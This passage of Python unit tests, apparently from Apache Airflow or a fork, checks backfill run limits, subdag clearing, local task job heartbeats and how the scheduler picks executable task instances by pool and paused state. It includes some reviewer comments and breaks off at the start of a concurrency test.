def test_backfill_max_limit_check_within_limit(self):
    """Backfill completes normally when the run count stays within max_active_runs."""
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_within_limit',
        max_active_runs=16)
    # Two hourly ticks -> two DagRuns, well inside the limit of 16.
    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()
    dagruns = DagRun.find(dag_id=dag.dag_id)
    self.assertEqual(2, len(dagruns))
    self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
    """Backfill must wait while max_active_runs is consumed by an existing
    out-of-range DagRun, then proceed once that run finishes."""
    dag_id = 'test_backfill_max_limit_check'
    run_id = 'test_dagrun'
    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE
    # Signalled by the worker thread once the blocking DagRun exists.
    dag_run_created_cond = threading.Condition()

    def run_backfill(cond):
        cond.acquire()
        try:
            dag = self._get_dag_test_max_active_limits(dag_id)
            # this session object is different than the one in the main thread
            thread_session = settings.Session()
            # Existing dagrun that is not within the backfill range
            dag.create_dagrun(
                run_id=run_id,
                state=State.RUNNING,
                execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
                start_date=DEFAULT_DATE,
            )
            thread_session.commit()
            cond.notify()
        finally:
            cond.release()
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()
        thread_session.close()

    backfill_job_thread = threading.Thread(target=run_backfill,
                                           name="run_backfill",
                                           args=(dag_run_created_cond,))
    dag_run_created_cond.acquire()
    session = settings.Session()
    backfill_job_thread.start()
    try:
        # at this point backfill can't run since the max_active_runs has been
        # reached, so it is waiting
        dag_run_created_cond.wait(timeout=1.5)
        dagruns = DagRun.find(dag_id=dag_id)
        dr = dagruns[0]
        self.assertEqual(1, len(dagruns))
        self.assertEqual(dr.run_id, run_id)
        # allow the backfill to execute by setting the existing dag run to SUCCESS,
        # backfill will execute dag runs 1 by 1
        dr.set_state(State.SUCCESS)
        session.merge(dr)
        session.commit()
        session.close()
        backfill_job_thread.join()
        dagruns = DagRun.find(dag_id=dag_id)
        self.assertEqual(3, len(dagruns))  # 2 from backfill + 1 existing
        self.assertEqual(dagruns[-1].run_id, dr.run_id)
    finally:
        dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
    """A pre-existing DagRun inside the backfill window does not block the
    backfill, but it does occupy the single max_active_runs slot."""
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_no_count_existing')
    start_date = DEFAULT_DATE
    end_date = DEFAULT_DATE
    # Existing dagrun that is within the backfill range
    dag.create_dagrun(run_id="test_existing_backfill",
                      state=State.RUNNING,
                      execution_date=DEFAULT_DATE,
                      start_date=DEFAULT_DATE)
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()
    # BackfillJob will run since the existing DagRun does not count for the max
    # active limit since it's within the backfill date range.
    dagruns = DagRun.find(dag_id=dag.dag_id)
    # will only be able to run 1 (the existing one) since there's just
    # one dag run slot left given the max_active_runs limit
    self.assertEqual(1, len(dagruns))
    self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
    """With max_active_runs=1 the backfill keeps looping until every run completes."""
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_complete_loop')
    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE
    # Given the max limit to be 1 in active dag runs, we need to run the
    # backfill job 3 times
    # NOTE(review): the window spans 2 hourly ticks, hence success_expected=2;
    # "3 times" above presumably refers to scheduler loops, not runs — confirm.
    success_expected = 2
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()
    success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
    running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
    self.assertEqual(success_expected, success_dagruns)
    self.assertEqual(0, running_dagruns)  # no dag_runs in running state are left
def test_sub_set_subdag(self):
    """Backfilling a filtered sub-DAG replaces the existing DagRun's run_id and
    runs only the selected tasks; the remaining tasks stay in state NONE."""
    dag = DAG(
        'test_sub_set_subdag',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})
    with dag:
        op1 = DummyOperator(task_id='leave1')
        op2 = DummyOperator(task_id='leave2')
        op3 = DummyOperator(task_id='upstream_level_1')
        op4 = DummyOperator(task_id='upstream_level_2')
        op5 = DummyOperator(task_id='upstream_level_3')
        # order randomly
        op2.set_downstream(op3)
        op1.set_downstream(op3)
        op4.set_downstream(op5)
        op3.set_downstream(op4)
    dag.clear()
    dr = dag.create_dagrun(run_id="test",
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE)
    executor = TestExecutor(do_update=True)
    # Only the two 'leave*' tasks are selected for the backfill.
    sub_dag = dag.sub_dag(task_regex="leave*",
                          include_downstream=False,
                          include_upstream=False)
    job = BackfillJob(dag=sub_dag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor)
    job.run()
    self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
    # the run_id should have changed, so a refresh won't work
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
    dr = drs[0]
    self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
                     dr.run_id)
    for ti in dr.get_task_instances():
        if ti.task_id == 'leave1' or ti.task_id == 'leave2':
            self.assertEqual(State.SUCCESS, ti.state)
        else:
            self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
    """A backfill over a run with mixed pre-set TI states executes only the
    blank/scheduled/retry TIs and fails overall because of the FAILED one."""
    dag = DAG(
        'test_backfill_fill_blanks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'},
    )
    with dag:
        op1 = DummyOperator(task_id='op1')
        op2 = DummyOperator(task_id='op2')
        op3 = DummyOperator(task_id='op3')
        op4 = DummyOperator(task_id='op4')
        op5 = DummyOperator(task_id='op5')
        op6 = DummyOperator(task_id='op6')
    dag.clear()
    dr = dag.create_dagrun(run_id='test',
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE)
    executor = TestExecutor(do_update=True)
    session = settings.Session()
    tis = dr.get_task_instances()
    # Pre-seed one TI per interesting state (op6 keeps state None).
    for ti in tis:
        if ti.task_id == op1.task_id:
            ti.state = State.UP_FOR_RETRY
            ti.end_date = DEFAULT_DATE
        elif ti.task_id == op2.task_id:
            ti.state = State.FAILED
        elif ti.task_id == op3.task_id:
            ti.state = State.SKIPPED
        elif ti.task_id == op4.task_id:
            ti.state = State.SCHEDULED
        elif ti.task_id == op5.task_id:
            ti.state = State.UPSTREAM_FAILED
        # op6 = None
        session.merge(ti)
    session.commit()
    session.close()
    job = BackfillJob(dag=dag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor)
    self.assertRaisesRegexp(
        AirflowException,
        'Some task instances failed',
        job.run)
    self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
    # the run_id should have changed, so a refresh won't work
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
    dr = drs[0]
    self.assertEqual(dr.state, State.FAILED)
    tis = dr.get_task_instances()
    # Retry/scheduled/blank ran to SUCCESS; terminal states were left alone.
    for ti in tis:
        if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
            self.assertEqual(ti.state, State.SUCCESS)
        elif ti.task_id == op2.task_id:
            self.assertEqual(ti.state, State.FAILED)
        elif ti.task_id == op3.task_id:
            self.assertEqual(ti.state, State.SKIPPED)
        elif ti.task_id == op5.task_id:
            self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
    """Backfilling a subdag executes all 5 of its task instances."""
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag_op_task = dag.get_task('section-1')
    subdag = subdag_op_task.subdag
    subdag.schedule_interval = '@daily'
    start_date = timezone.utcnow()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=start_date,
                      end_date=start_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()
    history = executor.history
    subdag_history = history[0]
    # check that all 5 task instances of the subdag 'section-1' were executed
    self.assertEqual(5, len(subdag_history))
    for sdh in subdag_history:
        # history entry layout: the task instance sits at index 3.
        ti = sdh[3]
        self.assertIn('section-1-task-', ti.task_id)
    subdag.clear()
    dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
    """Clearing a subdag task with include_parentdag=True must also clear the
    parent DAG's SubDagOperator and its downstream tasks."""
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag_op_task = dag.get_task('section-1')
    subdag = subdag_op_task.subdag
    subdag.schedule_interval = '@daily'
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor,
                      donot_pickle=True)
    with timeout(seconds=30):
        job.run()
    ti0 = TI(
        task=subdag.get_task('section-1-task-1'),
        execution_date=DEFAULT_DATE)
    ti0.refresh_from_db()
    self.assertEqual(ti0.state, State.SUCCESS)
    sdag = subdag.sub_dag(
        task_regex='section-1-task-1',
        include_downstream=True,
        include_upstream=False)
    sdag.clear(
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE,
        include_parentdag=True)
    ti0.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual (3 occurrences).
    self.assertEqual(State.NONE, ti0.state)
    ti1 = TI(
        task=dag.get_task('some-other-task'),
        execution_date=DEFAULT_DATE)
    self.assertEqual(State.NONE, ti1.state)
    # Checks that all the Downstream tasks for Parent DAG
    # have been cleared
    for task in subdag_op_task.downstream_list:
        ti = TI(
            task=dag.get_task(task.task_id),
            execution_date=DEFAULT_DATE
        )
        self.assertEqual(State.NONE, ti.state)
    subdag.clear()
    dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
    """
    Ensure that subdag operators execute properly in the case where
    an associated task of the subdag has been removed from the dag
    definition, but has instances in the database from previous runs.
    """
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag = dag.get_task('section-1').subdag
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor,
                      donot_pickle=True)
    # Plant a stale REMOVED task instance before the backfill runs.
    removed_task_ti = TI(
        task=DummyOperator(task_id='removed_task'),
        execution_date=DEFAULT_DATE,
        state=State.REMOVED)
    removed_task_ti.dag_id = subdag.dag_id
    session = settings.Session()
    session.merge(removed_task_ti)
    with timeout(seconds=30):
        job.run()
    # Every still-defined task ran to SUCCESS...
    for task in subdag.tasks:
        instance = session.query(TI).filter(
            TI.dag_id == subdag.dag_id,
            TI.task_id == task.task_id,
            TI.execution_date == DEFAULT_DATE).first()
        self.assertIsNotNone(instance)
        self.assertEqual(instance.state, State.SUCCESS)
    # ...while the removed task's instance stays REMOVED.
    removed_task_ti.refresh_from_db()
    self.assertEqual(removed_task_ti.state, State.REMOVED)
    subdag.clear()
    dag.clear()
def test_update_counters(self):
    """BackfillJob._update_counters must move a finished TI out of `running`
    into the bucket matching its state (or back onto to_run for NONE)."""
    dag = DAG(
        dag_id='test_manage_executor_state',
        start_date=DEFAULT_DATE)
    task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    job = BackfillJob(dag=dag)
    session = settings.Session()
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    ti = TI(task1, dr.execution_date)
    ti.refresh_from_db()
    ti_status = BackfillJob._DagRunTaskStatus()
    # test for success
    ti.set_state(State.SUCCESS, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 1)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 0)
    ti_status.succeeded.clear()
    # test for skipped
    ti.set_state(State.SKIPPED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 1)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 0)
    ti_status.skipped.clear()
    # test for failed
    ti.set_state(State.FAILED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 1)
    self.assertTrue(len(ti_status.to_run) == 0)
    ti_status.failed.clear()
    # test for none: a TI reset to NONE goes back onto the to_run queue
    ti.set_state(State.NONE, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 1)
    session.close()
def test_dag_get_run_dates(self):
    """DAG.get_run_dates: with no schedule the window collapses to the
    start date; with an hourly schedule every hour in the window appears."""
    def make_backfill_dag(schedule_interval=None):
        # Build a minimal one-task DAG for get_run_dates probing.
        backfill_dag = DAG(
            dag_id='test_get_dates',
            start_date=DEFAULT_DATE,
            schedule_interval=schedule_interval)
        DummyOperator(
            task_id='dummy',
            dag=backfill_dag,
            owner='airflow')
        return backfill_dag

    unscheduled = make_backfill_dag()
    self.assertEqual(
        [DEFAULT_DATE],
        unscheduled.get_run_dates(start_date=DEFAULT_DATE,
                                  end_date=DEFAULT_DATE))

    hourly = make_backfill_dag(schedule_interval="@hourly")
    expected_dates = [DEFAULT_DATE - datetime.timedelta(hours=h)
                      for h in (3, 2, 1, 0)]
    self.assertEqual(
        expected_dates,
        hourly.get_run_dates(
            start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
            end_date=DEFAULT_DATE))
class LocalTaskJobTest(unittest.TestCase):
    """Tests for LocalTaskJob: attribute wiring, the heartbeat hostname/pid
    guard, mark-success handling, and the double-trigger protection."""

    def setUp(self):
        pass

    def test_localtaskjob_essential_attr(self):
        """
        Check whether essential attributes
        of LocalTaskJob can be assigned with
        proper values without intervention
        """
        dag = DAG(
            'test_localtaskjob_essential_attr',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        ti = dr.get_task_instance(task_id=op1.task_id)
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
        # Every essential attribute must both exist and be non-None.
        check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
        self.assertTrue(all(check_result_1))
        check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
        self.assertTrue(all(check_result_2))

    @patch('os.getpid')
    def test_localtaskjob_heartbeat(self, mock_pid):
        """heartbeat_callback raises AirflowException when the TI's recorded
        hostname or pid does not match this process, and passes otherwise."""
        session = settings.Session()
        dag = DAG(
            'test_localtaskjob_heartbeat',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = "blablabla"  # deliberately wrong hostname
        session.commit()
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        self.assertRaises(AirflowException, job1.heartbeat_callback)
        # Align hostname and pid with the (mocked) current process.
        mock_pid.return_value = 1
        ti.state = State.RUNNING
        try:
            callable_path = conf.get('core', 'hostname_callable')
        except (AirflowConfigException, XToolConfigException):
            callable_path = None
        ti.hostname = get_hostname(callable_path)
        ti.pid = 1
        session.merge(ti)
        session.commit()
        ret = job1.heartbeat_callback()
        # was: assertEqual(ret, None) -- assertIsNone is the idiomatic check
        self.assertIsNone(ret)
        # A pid mismatch must again raise.
        mock_pid.return_value = 2
        self.assertRaises(AirflowException, job1.heartbeat_callback)

    def test_mark_success_no_kill(self):
        """
        Test that ensures that mark_success in the UI doesn't cause
        the task to fail, and that the task exits
        """
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_mark_success')
        task = dag.get_task('task1')
        session = settings.Session()
        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # Poll (up to ~5s) until the task is actually running.
        # was: for i in range(0, 50) with an unused index
        for _ in range(50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # Simulate "mark success" from the UI.
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()
        process.join(timeout=10)
        self.assertFalse(process.is_alive())
        ti.refresh_from_db()
        self.assertEqual(State.SUCCESS, ti.state)

    def test_localtaskjob_double_trigger(self):
        """A second LocalTaskJob for a TI already running elsewhere must not
        start the task runner or disturb the recorded pid/state."""
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')
        session = settings.Session()
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        ti.state = State.RUNNING
        try:
            callable_path = conf.get('core', 'hostname_callable')
        except (AirflowConfigException, XToolConfigException):
            callable_path = None
        ti.hostname = get_hostname(callable_path)
        ti.pid = 1
        session.commit()
        ti_run = TI(task=task, execution_date=DEFAULT_DATE)
        job1 = LocalTaskJob(task_instance=ti_run,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
            job1.run()
            mock_method.assert_not_called()
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        self.assertEqual(ti.pid, 1)
        self.assertEqual(ti.state, State.RUNNING)
        session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
    """Load the dagbag and wipe scheduler-related tables for a clean start."""
    self.dagbag = DagBag()
    session = settings.Session()
    for model in (models.DagRun, models.ImportError):
        session.query(model).delete()
    session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
    """
    Utility function that runs a single scheduler loop without actually
    changing/scheduling any dags. This is useful to simulate the other side effects of
    running a scheduler loop, e.g. to see what parse errors there are in the
    dags_folder.

    :param dags_folder: the directory to traverse
    :type dags_folder: str
    """
    scheduler = SchedulerJob(
        dag_id='this_dag_doesnt_exist',  # We don't want to actually run anything
        num_runs=1,
        # os.path.join() with a single argument was a no-op; pass directly
        subdir=dags_folder)
    scheduler.heartrate = 0
    scheduler.run()
def _make_simple_dag_bag(self, dags):
    """Wrap each DAG in a SimpleDag and collect them into a SimpleDagBag."""
    simple_dags = list(map(SimpleDag, dags))
    return SimpleDagBag(simple_dags)
def test_process_executor_events(self):
    """Executor events must only be applied to TIs whose dag_id is present
    in the simple dag bag handed to _process_executor_events."""
    dag_id = "test_process_executor_events"
    dag_id2 = "test_process_executor_events_2"
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag2, task_id=task_id_1)
    dagbag1 = self._make_simple_dag_bag([dag])
    dagbag2 = self._make_simple_dag_bag([dag2])
    scheduler = SchedulerJob()
    session = settings.Session()
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.QUEUED
    session.merge(ti1)
    session.commit()
    executor = TestExecutor()
    executor.event_buffer[ti1.key] = State.FAILED
    scheduler.executor = executor
    # dag bag does not contain dag_id: the FAILED event must be ignored
    scheduler._process_executor_events(simple_dag_bag=dagbag2)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.QUEUED)
    # dag bag does contain dag_id: the FAILED event is applied
    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.FAILED)
    # a SUCCESS event leaves an already-successful TI untouched
    ti1.state = State.SUCCESS
    session.merge(ti1)
    session.commit()
    executor.event_buffer[ti1.key] = State.SUCCESS
    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
    """A SCHEDULED TI belonging to a paused DAG must not be queued."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # Mark the DAG paused through its ORM model.
    dagmodel = models.DagModel()
    dagmodel.dag_id = dag_id
    dagmodel.is_paused = True
    session.merge(ti1)
    session.merge(dr1)
    session.add(dagmodel)
    session.commit()
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # was: assertEquals -- a deprecated alias of assertEqual
    self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
    """
    Tests that tasks without dagrun still get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    # Shift the execution date so this TI has no matching dagrun.
    ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
    session.merge(ti1)
    session.commit()
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # was: assertEquals -- a deprecated alias of assertEqual
    self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
    """
    Tests that backfill tasks won't get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
    task_id_1 = 'dummy_task'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    # A backfill-prefixed run_id marks the dagrun as a backfill run.
    dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
    ti1 = TI(task1, dr1.execution_date)
    ti1.refresh_from_db()
    ti1.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(dr1)
    session.commit()
    self.assertTrue(dr1.is_backfill)
    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # was: assertEquals -- a deprecated alias of assertEqual
    self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
    """TIs from backfill runs are excluded; TIs with no dagrun and TIs from
    a normal dagrun are both executable."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'  # make dr2 a backfill run
    ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
    ti_backfill = TI(task1, dr2.execution_date)
    ti_with_dagrun = TI(task1, dr1.execution_date)
    # ti_with_paused
    ti_no_dagrun.state = State.SCHEDULED
    ti_backfill.state = State.SCHEDULED
    ti_with_dagrun.state = State.SCHEDULED
    session.merge(dr2)
    session.merge(ti_no_dagrun)
    session.merge(ti_backfill)
    session.merge(ti_with_dagrun)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # BUG FIX: map() returns a one-shot iterator in Python 3; the first
    # assertIn would partially consume it and the second membership test
    # could then falsely fail. Materialize the keys as a list instead.
    res_keys = [ti.key for ti in res]
    self.assertIn(ti_no_dagrun.key, res_keys)
    self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
    """Pool slot limits cap how many TIs per pool are executable: pool 'a'
    has one slot (one of two TIs fits), pool 'b' has plenty (both fit)."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
    task_id_1 = 'dummy'
    task_id_2 = 'dummydummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
    task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    tis = ([
        TI(task1, dr1.execution_date),
        TI(task2, dr1.execution_date),
        TI(task1, dr2.execution_date),
        TI(task2, dr2.execution_date)
    ])
    for ti in tis:
        ti.state = State.SCHEDULED
        session.merge(ti)
    pool = models.Pool(pool='a', slots=1, description='haha')
    pool2 = models.Pool(pool='b', slots=100, description='haha')
    session.add(pool)
    session.add(pool2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    self.assertEqual(3, len(res))
    # was: a manual append loop; a comprehension is the idiomatic form
    res_keys = [ti.key for ti in res]
    self.assertIn(tis[0].key, res_keys)
    self.assertIn(tis[1].key, res_keys)
    self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
    """A TI assigned to an undefined pool is never considered executable."""
    dag_id = 'SchedulerJobTest.test_nonexistent_pool'
    task_id = 'dummy_wrong_pool'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dagrun = scheduler.create_dag_run(dag)
    ti = TI(task, dagrun.execution_date)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    executable = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    self.assertEqual(0, len(executable))
def test_find_executable_task_instances_none(self):
    """With no TI in a schedulable state, nothing is executable."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    scheduler.create_dag_run(dag)
    session.commit()
    executable = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(executable))
def test_find_executable_task_instances_concurrency(self):
    """DAG concurrency=2 caps executable TIs: one RUNNING TI leaves room
    for exactly one more; two occupied slots leave room for none."""
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
